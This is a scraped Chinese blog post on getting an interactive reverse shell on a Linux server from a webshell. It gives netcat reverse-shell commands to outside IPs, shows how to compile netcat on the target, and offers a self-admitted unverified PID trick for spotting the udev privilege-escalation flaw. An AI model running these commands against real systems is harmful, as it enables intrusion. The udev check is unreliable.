Warning: mkdir(): No space left on device in D:\wwwroot\lanshangzhi.com\auto_cache.php on line 25

Warning: chmod(): No such file or directory in D:\wwwroot\lanshangzhi.com\auto_cache.php on line 26
php如何反弹shell,Linux_Linux下通过WebShell反弹CmdLine Shell小技巧,?(昨天又不小心搜到篇自己-历史学

php如何反弹shell,Linux_Linux下通过WebShell反弹CmdLine Shell小技巧,?(昨天又不小心搜到篇自己

发布时间:2021-10-20 15:17:41

Linux下通过WebShell反弹CmdLine Shell小技巧


(昨天又不小心搜到篇自己以前写的文章,转了很多地方,没见一个写版权的)


昨晚(应该是今天凌晨)玩了半天朋友给的Linux的WebShell,本来想实践一下UDEV提权呢,最后发现服务器貌似已经打过补丁了。


不过还是有其他的收获的,所以我就YY下Linux反弹shell的问题。


Linux提权绝大部分都靠的是Local Exploit。WebShell一般都可以执行命令,但是我们的EXP必须在可交互环境运行,否则如果直接在WebShell执行,即使能提权成功,我们也没法利用到。所以我们需要先反弹一个CmdLine Shell回来(直接说成CmdShell怕人误解...因为Win有个cmd.exe ^_^),然后在命令行终端下执行EXP进行提权。


一般情况下,绝大多数人都会通过PHPWebShell的Back Connect功能弹回一个Shell,但是有时候会碰到服务器不支持PHP或者WebShell没法反弹的情况,比如这两天朋友给我的一个JSPShell所在服务器只支持JSP,不支持PHP。这时候,我们经典的netcat就可以派上用场了。


*时在Windows下做事的时候,在必要的情况下我们可以先在本机运行nc -vv -lp 1234监听端口,然后在肉鸡上nc 12.21.12.21 1234 -e cmd.exe给我们反弹一个CmdShell,这个方法在Linux仍然可行。


在本机监听后,在WebShell运行nc 12.21.12.21 1234 -e /bin/sh就能弹一个CmdLine Shell给我们。


但我们经常碰到的情况并不都是这么100%顺利的,像昨晚整的那两台,每台都是不能直接执行nc的。一台有nc,但执行从是不起作用,另外一台直接压根就没有nc....


不过,这个难不倒我们,我们可以给他装一个嘛,比较快捷的方法是,我们可以到http://netcat.sourceforge.net/download.php下载nc的源码,先在我们自己linux机器上编译好以后把bin文件传上去(我开始传的我的Debian自带的netcat,结果仍然不能运行....)。如果还不行,那就把源码传上去,在目标机器上直接编译。


昨晚那两台机器,一台我是直接传的本地编译后的,一台是在目标机器上编译的。如果直接传的nc可以运行的话还比较好说,如果需要在目标机器上编译的话,这里有点小技巧:


因为在得到CmdLine Shell前,我们只能在WebShell里执行命令,一般每次只能执行一条,然后等回显。假如我们的WebShell在/var/www/site目录,那么我们每次执行命令默认的当前路径都是/var/www/site,而我们的netcat源码包解压在了/tmp/netcatsrc文件夹,这样的话,我们编译netcat的时候,configure还好说,可用/tmp/netcatsrc/configure命令,但下一步make的时候就不行了,因为当前路径是/var/www/site,而不是我们想要的/tmp/netcatsrc/,所以我们configure完了make的时候会报错。


解决这个问题其实也很简单,可以直接把两句写成一句就可以:cd /tmp/netcatsrc;make


用分号隔开写,把make跟在目录切换命令后面,这样编译的时候就不会报错了。(流浪猫教的..^_^)


在还没有得到CmdLine Shell的时候,这样的写法还是很有用的。


编译成功以后,我们就可以输入命令反弹Shell了(比如我这里nc路径是/tmp/nc):


本地nc -vv -lp 80后


/tmp/nc 202.xx.xx.250 80 -e /bin/sh就可以给我吗弹回来一个CmdLine Shell。


效果如下图:


----------------


要注意反弹的Linux Shell是没有$提示符的哦,执行一句返回一句。


还有一点就是这里反弹Shell的时候我运行的是/bin/sh,当然运行/bin/bash也可以。


不过我觉得最好还是运行/bin/sh吧,因为/bin/sh的权限比/bin/bash放的更开一些


顺便说一下怎么判断目标是否有UDEV这个漏洞。


Linux我还不知道怎么样查看它是否打过这个补丁,所以我想了个比较简单的办法:


1.执行cat /proc/net/netlink,记录下PID A


2.执行ps aux | grep udev ,记下root的PID B


3.如果A = B - 1,则存在漏洞,否则不存在


这是我自己想的,因为获得PID的时候有这两种方法,所以我通过他们对比来判断,但我并不能确定我这方法是100%正确的,仅供参考。


效果如下图:


在反弹的Shell里执行,发现得到的PID不一样,2487 != 1230


在我自己机器上,PID一样,1184=1185-1


相关阅读:


ASP.NET 页面中动态增加的控件、添加事件


用asp.net获取服务器和客服端有关信息


专访MySQL CEO:MySQL与企业级应用


批处理 添加隐藏用户代码


jQuery使用手册之 事件处理


js检测客户端不是firefox则提示下载


PHP配置文件PHP.INI的中文注释版


绘制几何图形:使用android.graphics类


RedHat Linux 5系统下使用远程桌面环境


javascript创建数组的最简代码


删除Vista系统文件的方法


CSS解决文字环绕图片问题


jquery 学*之二 属性(html()与html(val))


常用js脚本

相关文档

  • Golang - map和切片混用
  • 抖音多少粉丝能直播
  • 生成对抗网络GAN损失函数Loss的计算
  • metasploit实战篇之metasploitable2
  • 平绒的英文及参考例句
  • 企业项目启动仪式主持词范文
  • 进口关税及增值税的会计分录
  • 新学期我要这样做
  • 美国留学该携带哪些药品
  • 村级脱贫攻坚工作总结和下步工作打算
  • iphonexs三维触控没反应
  • airflow CeleryExecutor模式报错
  • 顶岗实习支教总结
  • 新炒锅炒菜时怎么样才不会粘锅底
  • 论文笔记:CLOCs: Camera-LiDAR Object Candidates Fusion for 3D Object Detection
  • 工程个人总结
  • 李宏毅ML笔记4: 分类
  • Storm 入门与安装
  • JAVAWEB开发之JSP、EL、及会话技术(Cookie和Session)的使用详解
  • 趵突泉优秀教案设计及反思
  • 江苏大众创业创新政策
  • 消防安全黑板报设计相关内容
  • 芦荟怎么敷脸
  • 基于ZooKeeper的服务注册实现
  • 每个季节适合喝什么茶
  • 波斯顿龙虾怎么炒才好吃
  • 我们班的“搞笑大王”
  • 葛灵胶囊说明书及功效
  • 关于友谊的性签名87句
  • 美的变频空调e5通病
  • 猜你喜欢

    电脑版